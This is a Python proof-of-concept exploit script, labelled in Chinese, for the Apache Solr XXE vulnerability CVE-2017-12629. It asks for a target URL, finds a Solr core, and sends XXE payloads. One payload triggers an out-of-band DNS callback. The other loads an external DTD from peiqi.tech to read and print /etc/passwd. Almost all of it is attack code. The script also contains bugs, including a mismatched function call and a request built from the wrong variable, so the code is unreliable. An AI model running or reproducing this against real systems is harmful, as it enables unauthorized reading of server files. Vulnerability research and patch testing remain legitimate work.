Apache Solr XXE 漏洞 CVE-2017-12629.py
3.62 KB / 2021-04-15 12:15:18
#!/usr/bin/python3
#-*- coding:utf-8 -*-
# author : PeiQi
# from : http://wiki.peiqi.tech
import requests
import sys
import json
import random
def title():
print('+------------------------------------------')
print('+ \033[34mPOC_Des: http://wiki.peiqi.tech \033[0m')
print('+ \033[34mGithub : https://github.com/PeiQi0 \033[0m')
print('+ \033[34m公众号 : PeiQi文库 \033[0m')
print('+ \033[34mVersion: Apache Solr < 7.1 \033[0m')
print('+ \033[36m使用格式: python3 cve-2017-12629-xxe.py \033[0m')
print('+ \033[36mUrl >>> http://xxx.xxx.xxx.xxx:8983 \033[0m')
print('+ \033[36mcmd >>> dnslog地址(漏洞外连检测) \033[0m')
print('+ \033[36mCmd >>> xxe_file(读取/etc/passwd) \033[0m')
print('+------------------------------------------')
def POC_1(target_url):
core_url = target_url + "/solr/admin/cores?indexInfo=false&wt=json"
try:
response = requests.request("GET", url=core_url, timeout=10)
core_name = list(json.loads(response.text)["status"])[0]
print("\033[32m[o] 成功获得core_name,Url为:" + target_url + "/solr/" + core_name + "/config\033[0m")
return core_name
except:
print("\033[31m[x] 目标Url漏洞利用失败\033[0m")
sys.exit(0)
def POC_2(target_url, core_name, dnslog_url):
dns_payload = """
/solr/%s/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "%s"><a></a>'}&wt=xml
""" % (core_name, dnslog_url)
vuln_url = target_url + dnslog_url
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
try:
response = requests.request("GET", url=vuln_url, headers=headers, timeout=30)
if "HTTP ERROR 500" in response.text:
print("\033[31m[x] 漏洞利用失败 \033[0m")
else:
print("\033[32m[o] 请查看dnslog响应 \033[0m")
except:
print("\033[31m[x] 漏洞利用失败 \033[0m")
def POC_3(target_url, core_name):
file_payload = """/solr/{}/select?&q=%3C%3fxml+version%3d%221.0%22+%3f%3E%3C!DOCTYPE+root%5b%3C!ENTITY+%25+ext+SYSTEM+%22http%3a%2f%2fpeiqi.tech%2f1.dtd%22%3E%25ext%3b%25ent%3b%5d%3E%3Cr%3E%26data%3b%3C%2fr%3E&wt=xml&defType=xmlparser""".format(core_name)
vuln_url = target_url + file_payload
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"
}
response = requests.request("GET", url=vuln_url, headers=headers, timeout=30)
if "/usr/sbin" in response.text:
print("\033[32m[o] 漏洞成功利用,响应为\n \033[0m",response.text)
else:
print("\033[31m[x] 漏洞利用失败 \033[0m")
if __name__ == '__main__':
title()
target_url = str(input("\033[35mPlease input Attack Url\nUrl >>> \033[0m"))
core_name = POC_1(target_url)
while True:
n = random.randint(1, 9999)
cmd = input("\033[35mCmd >>> \033[0m")
if cmd == "exit":
exit(0)
elif cmd == "dnslog":
dnslog_url = str(input('\033[35m请输入你的dnslog地址:\033[0m'))
POC_2(target_url, core_name, dnslog_url, n)
elif cmd == "xxe_file":
POC_3(target_url, core_name)